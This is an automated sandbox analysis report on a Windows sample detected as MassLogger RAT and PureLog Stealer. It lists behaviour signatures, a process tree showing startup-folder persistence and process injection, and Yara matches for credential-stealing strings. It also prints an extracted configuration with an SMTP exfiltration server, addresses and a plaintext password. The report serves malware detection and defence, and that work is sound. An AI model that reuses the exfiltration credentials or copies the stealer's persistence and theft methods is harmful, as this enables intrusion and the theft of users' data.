Edit tour

Windows Analysis Report
yqfze5TKW7.exe

Overview

General Information

Sample name:	yqfze5TKW7.exe renamed because original name is a hash value
Original sample name:	fb045fee03da4085d3999f9ffb0f8cd287eda8d3842e1c29e156b38b4e28ac76.exe
Analysis ID:	1588353
MD5:	30fb530da7cf794b61893df575122863
SHA1:	6f2cbeb0861101e7af3a60016265e28de876946a
SHA256:	fb045fee03da4085d3999f9ffb0f8cd287eda8d3842e1c29e156b38b4e28ac76
Tags:	AsyncRATexeuser-adrian__luca
Infos:

Detection

MassLogger RAT, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected AntiVM3

Yara detected MassLogger RAT

Yara detected PureLog Stealer

Yara detected Telegram RAT

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Drops VBS files to the startup folder

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

yqfze5TKW7.exe (PID: 6264 cmdline: "C:\Users\user\Desktop\yqfze5TKW7.exe" MD5: 30FB530DA7CF794B61893DF575122863)

porcelainization.exe (PID: 6040 cmdline: "C:\Users\user\Desktop\yqfze5TKW7.exe" MD5: 30FB530DA7CF794B61893DF575122863)

RegSvcs.exe (PID: 5084 cmdline: "C:\Users\user\Desktop\yqfze5TKW7.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

wscript.exe (PID: 3952 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\porcelainization.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

porcelainization.exe (PID: 4540 cmdline: "C:\Users\user\AppData\Local\underbalance\porcelainization.exe" MD5: 30FB530DA7CF794B61893DF575122863)

RegSvcs.exe (PID: 4200 cmdline: "C:\Users\user\AppData\Local\underbalance\porcelainization.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "SMTP", "From": "sendxpreview@ypcog.shop", "Password": "k4T*5ia*ES", "Server": "ypcog.shop", "To": "preview@ypcog.shop", "Port": 587}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.2747257139.0000000003631000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x219d4:$a1: get_encryptedPassword 0x4990c:$a1: get_encryptedPassword 0x219a8:$a2: get_encryptedUsername 0x498e0:$a2: get_encryptedUsername 0x21a6c:$a3: get_timePasswordChanged 0x499a4:$a3: get_timePasswordChanged 0x21984:$a4: get_passwordField 0x498bc:$a4: get_passwordField 0x219ea:$a5: set_encryptedPassword 0x49922:$a5: set_encryptedPassword 0x217b7:$a7: get_logins 0x496ef:$a7: get_logins 0x20d25:$a8: GetOutlookPasswords 0x48c5d:$a8: GetOutlookPasswords 0x20239:$a9: StartKeylogger 0x48171:$a9: StartKeylogger 0x1ec93:$a10: KeyLoggerEventArgs 0x46bcb:$a10: KeyLoggerEventArgs 0x1ec62:$a11: KeyLoggerEventArgsEventHandler 0x46b9a:$a11: KeyLoggerEventArgsEventHandler 0x2188b:$a13: _encryptedPassword
00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5df4a:$a1: get_encryptedPassword 0x5df1e:$a2: get_encryptedUsername 0x5dfe2:$a3: get_timePasswordChanged 0x5defa:$a4: get_passwordField 0x5df60:$a5: set_encryptedPassword 0x5dd2d:$a7: get_logins 0x5d29b:$a8: GetOutlookPasswords 0x5c7af:$a9: StartKeylogger 0x5b209:$a10: KeyLoggerEventArgs 0x5b1d8:$a11: KeyLoggerEventArgsEventHandler 0x5de01:$a13: _encryptedPassword
00000003.00000002.2747027909.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1530661018.0000000003580000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 51 88 44 24 2B 88 44 24 2F B0 BF 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000003.00000002.2746643773.00000000027D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000003.00000002.2746643773.00000000027D0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d464:$a1: get_encryptedPassword 0x1d438:$a2: get_encryptedUsername 0x1d4fc:$a3: get_timePasswordChanged 0x1d414:$a4: get_passwordField 0x1d47a:$a5: set_encryptedPassword 0x1d247:$a7: get_logins 0x1c7b5:$a8: GetOutlookPasswords 0x1bcc9:$a9: StartKeylogger 0x1a723:$a10: KeyLoggerEventArgs 0x1a6f2:$a11: KeyLoggerEventArgsEventHandler 0x1d31b:$a13: _encryptedPassword
00000005.00000002.1650477461.00000000018E0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 51 88 44 24 2B 88 44 24 2F B0 BF 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c57c:$a1: get_encryptedPassword 0x1c550:$a2: get_encryptedUsername 0x1c614:$a3: get_timePasswordChanged 0x1c52c:$a4: get_passwordField 0x1c592:$a5: set_encryptedPassword 0x1c35f:$a7: get_logins 0x1b8cd:$a8: GetOutlookPasswords 0x1ade1:$a9: StartKeylogger 0x1983b:$a10: KeyLoggerEventArgs 0x1980a:$a11: KeyLoggerEventArgsEventHandler 0x1c433:$a13: _encryptedPassword
00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20c6b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20169:$a3: \Google\Chrome\User Data\Default\Login Data 0x20477:$a4: \Orbitum\User Data\Default\Login Data 0x2126f:$a5: \Kometa\User Data\Default\Login Data
Process Memory Space: RegSvcs.exe PID: 5084	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 5084	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 5084	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 5084	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 5084	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x10bf7:$a1: get_encryptedPassword 0x2f5fe:$a1: get_encryptedPassword 0x5fee5:$a1: get_encryptedPassword 0x10bcb:$a2: get_encryptedUsername 0x2f5d2:$a2: get_encryptedUsername 0x5feb9:$a2: get_encryptedUsername 0x10c8f:$a3: get_timePasswordChanged 0x2f696:$a3: get_timePasswordChanged 0x5ff7d:$a3: get_timePasswordChanged 0x10ba7:$a4: get_passwordField 0x2f5ae:$a4: get_passwordField 0x5fe95:$a4: get_passwordField 0x10c0d:$a5: set_encryptedPassword 0x2f614:$a5: set_encryptedPassword 0x5fefb:$a5: set_encryptedPassword 0x109e3:$a7: get_logins 0x2f3ea:$a7: get_logins 0x5fcd1:$a7: get_logins 0xffbb:$a8: GetOutlookPasswords 0x2e9c2:$a8: GetOutlookPasswords 0x5f2a9:$a8: GetOutlookPasswords
Process Memory Space: RegSvcs.exe PID: 4200	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 4200	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 4200	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 4200	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 4200	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x41f4e:$a1: get_encryptedPassword 0x41f22:$a2: get_encryptedUsername 0x41fe6:$a3: get_timePasswordChanged 0x41efe:$a4: get_passwordField 0x41f64:$a5: set_encryptedPassword 0x41d3a:$a7: get_logins 0x412f4:$a8: GetOutlookPasswords 0x40872:$a9: StartKeylogger 0x3f33c:$a10: KeyLoggerEventArgs 0x3f30b:$a11: KeyLoggerEventArgsEventHandler 0x41e05:$a13: _encryptedPassword
Click to see the 27 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.RegSvcs.exe.27d0ee8.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.27d0ee8.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c57c:$a1: get_encryptedPassword 0x1c550:$a2: get_encryptedUsername 0x1c614:$a3: get_timePasswordChanged 0x1c52c:$a4: get_passwordField 0x1c592:$a5: set_encryptedPassword 0x1c35f:$a7: get_logins 0x1b8cd:$a8: GetOutlookPasswords 0x1ade1:$a9: StartKeylogger 0x1983b:$a10: KeyLoggerEventArgs 0x1980a:$a11: KeyLoggerEventArgsEventHandler 0x1c433:$a13: _encryptedPassword
2.2.porcelainization.exe.3580000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 51 88 44 24 2B 88 44 24 2F B0 BF 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
3.2.RegSvcs.exe.39e6458.4.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.39e6458.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.39e6458.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.39e6458.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.39e6458.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1a77c:$a1: get_encryptedPassword 0x1a750:$a2: get_encryptedUsername 0x1a814:$a3: get_timePasswordChanged 0x1a72c:$a4: get_passwordField 0x1a792:$a5: set_encryptedPassword 0x1a55f:$a7: get_logins 0x19acd:$a8: GetOutlookPasswords 0x18fe1:$a9: StartKeylogger 0x17a3b:$a10: KeyLoggerEventArgs 0x17a0a:$a11: KeyLoggerEventArgsEventHandler 0x1a633:$a13: _encryptedPassword
3.2.RegSvcs.exe.39e6458.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1ee6b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e369:$a3: \Google\Chrome\User Data\Default\Login Data 0x1e677:$a4: \Orbitum\User Data\Default\Login Data 0x1f46f:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.3a0e390.6.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.3a0e390.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.3a0e390.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.3a0e390.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.3a0e390.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c57c:$a1: get_encryptedPassword 0x1c550:$a2: get_encryptedUsername 0x1c614:$a3: get_timePasswordChanged 0x1c52c:$a4: get_passwordField 0x1c592:$a5: set_encryptedPassword 0x1c35f:$a7: get_logins 0x1b8cd:$a8: GetOutlookPasswords 0x1ade1:$a9: StartKeylogger 0x1983b:$a10: KeyLoggerEventArgs 0x1980a:$a11: KeyLoggerEventArgsEventHandler 0x1c433:$a13: _encryptedPassword
3.2.RegSvcs.exe.3a0e390.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20c6b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20169:$a3: \Google\Chrome\User Data\Default\Login Data 0x20477:$a4: \Orbitum\User Data\Default\Login Data 0x2126f:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.27d0ee8.2.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.27d0ee8.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.27d0ee8.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1a77c:$a1: get_encryptedPassword 0x1a750:$a2: get_encryptedUsername 0x1a814:$a3: get_timePasswordChanged 0x1a72c:$a4: get_passwordField 0x1a792:$a5: set_encryptedPassword 0x1a55f:$a7: get_logins 0x19acd:$a8: GetOutlookPasswords 0x18fe1:$a9: StartKeylogger 0x17a3b:$a10: KeyLoggerEventArgs 0x17a0a:$a11: KeyLoggerEventArgsEventHandler 0x1a633:$a13: _encryptedPassword
3.2.RegSvcs.exe.26919ce.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.26919ce.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.26919ce.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.26919ce.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.26919ce.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1a77c:$a1: get_encryptedPassword 0x1a750:$a2: get_encryptedUsername 0x1a814:$a3: get_timePasswordChanged 0x1a72c:$a4: get_passwordField 0x1a792:$a5: set_encryptedPassword 0x1a55f:$a7: get_logins 0x19acd:$a8: GetOutlookPasswords 0x18fe1:$a9: StartKeylogger 0x17a3b:$a10: KeyLoggerEventArgs 0x17a0a:$a11: KeyLoggerEventArgsEventHandler 0x1a633:$a13: _encryptedPassword
3.2.RegSvcs.exe.26919ce.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1ee6b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e369:$a3: \Google\Chrome\User Data\Default\Login Data 0x1e677:$a4: \Orbitum\User Data\Default\Login Data 0x1f46f:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.39e5570.5.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.39e5570.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.39e5570.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.39e5570.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.39e5570.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1b664:$a1: get_encryptedPassword 0x1b638:$a2: get_encryptedUsername 0x1b6fc:$a3: get_timePasswordChanged 0x1b614:$a4: get_passwordField 0x1b67a:$a5: set_encryptedPassword 0x1b447:$a7: get_logins 0x1a9b5:$a8: GetOutlookPasswords 0x19ec9:$a9: StartKeylogger 0x18923:$a10: KeyLoggerEventArgs 0x188f2:$a11: KeyLoggerEventArgsEventHandler 0x1b51b:$a13: _encryptedPassword
3.2.RegSvcs.exe.39e5570.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1fd53:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1f251:$a3: \Google\Chrome\User Data\Default\Login Data 0x1f55f:$a4: \Orbitum\User Data\Default\Login Data 0x20357:$a5: \Kometa\User Data\Default\Login Data
6.2.RegSvcs.exe.3300000.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
6.2.RegSvcs.exe.3300000.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.RegSvcs.exe.3300000.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.RegSvcs.exe.3300000.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.RegSvcs.exe.3300000.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c57c:$a1: get_encryptedPassword 0x1c550:$a2: get_encryptedUsername 0x1c614:$a3: get_timePasswordChanged 0x1c52c:$a4: get_passwordField 0x1c592:$a5: set_encryptedPassword 0x1c35f:$a7: get_logins 0x1b8cd:$a8: GetOutlookPasswords 0x1ade1:$a9: StartKeylogger 0x1983b:$a10: KeyLoggerEventArgs 0x1980a:$a11: KeyLoggerEventArgsEventHandler 0x1c433:$a13: _encryptedPassword
6.2.RegSvcs.exe.3300000.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20c6b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20169:$a3: \Google\Chrome\User Data\Default\Login Data 0x20477:$a4: \Orbitum\User Data\Default\Login Data 0x2126f:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.27d0000.3.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.27d0000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.27d0000.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1b664:$a1: get_encryptedPassword 0x1b638:$a2: get_encryptedUsername 0x1b6fc:$a3: get_timePasswordChanged 0x1b614:$a4: get_passwordField 0x1b67a:$a5: set_encryptedPassword 0x1b447:$a7: get_logins 0x1a9b5:$a8: GetOutlookPasswords 0x19ec9:$a9: StartKeylogger 0x18923:$a10: KeyLoggerEventArgs 0x188f2:$a11: KeyLoggerEventArgsEventHandler 0x1b51b:$a13: _encryptedPassword
3.2.RegSvcs.exe.39e5570.5.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.39e5570.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.39e5570.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.39e5570.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.39e5570.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d464:$a1: get_encryptedPassword 0x4539c:$a1: get_encryptedPassword 0x1d438:$a2: get_encryptedUsername 0x45370:$a2: get_encryptedUsername 0x1d4fc:$a3: get_timePasswordChanged 0x45434:$a3: get_timePasswordChanged 0x1d414:$a4: get_passwordField 0x4534c:$a4: get_passwordField 0x1d47a:$a5: set_encryptedPassword 0x453b2:$a5: set_encryptedPassword 0x1d247:$a7: get_logins 0x4517f:$a7: get_logins 0x1c7b5:$a8: GetOutlookPasswords 0x446ed:$a8: GetOutlookPasswords 0x1bcc9:$a9: StartKeylogger 0x43c01:$a9: StartKeylogger 0x1a723:$a10: KeyLoggerEventArgs 0x4265b:$a10: KeyLoggerEventArgs 0x1a6f2:$a11: KeyLoggerEventArgsEventHandler 0x4262a:$a11: KeyLoggerEventArgsEventHandler 0x1d31b:$a13: _encryptedPassword
3.2.RegSvcs.exe.39e5570.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x21b53:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49a8b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21051:$a3: \Google\Chrome\User Data\Default\Login Data 0x48f89:$a3: \Google\Chrome\User Data\Default\Login Data 0x2135f:$a4: \Orbitum\User Data\Default\Login Data 0x49297:$a4: \Orbitum\User Data\Default\Login Data 0x22157:$a5: \Kometa\User Data\Default\Login Data 0x4a08f:$a5: \Kometa\User Data\Default\Login Data
6.2.RegSvcs.exe.3300000.2.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
6.2.RegSvcs.exe.3300000.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.RegSvcs.exe.3300000.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.RegSvcs.exe.3300000.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.RegSvcs.exe.3300000.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1a77c:$a1: get_encryptedPassword 0x1a750:$a2: get_encryptedUsername 0x1a814:$a3: get_timePasswordChanged 0x1a72c:$a4: get_passwordField 0x1a792:$a5: set_encryptedPassword 0x1a55f:$a7: get_logins 0x19acd:$a8: GetOutlookPasswords 0x18fe1:$a9: StartKeylogger 0x17a3b:$a10: KeyLoggerEventArgs 0x17a0a:$a11: KeyLoggerEventArgsEventHandler 0x1a633:$a13: _encryptedPassword
6.2.RegSvcs.exe.3300000.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1ee6b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e369:$a3: \Google\Chrome\User Data\Default\Login Data 0x1e677:$a4: \Orbitum\User Data\Default\Login Data 0x1f46f:$a5: \Kometa\User Data\Default\Login Data
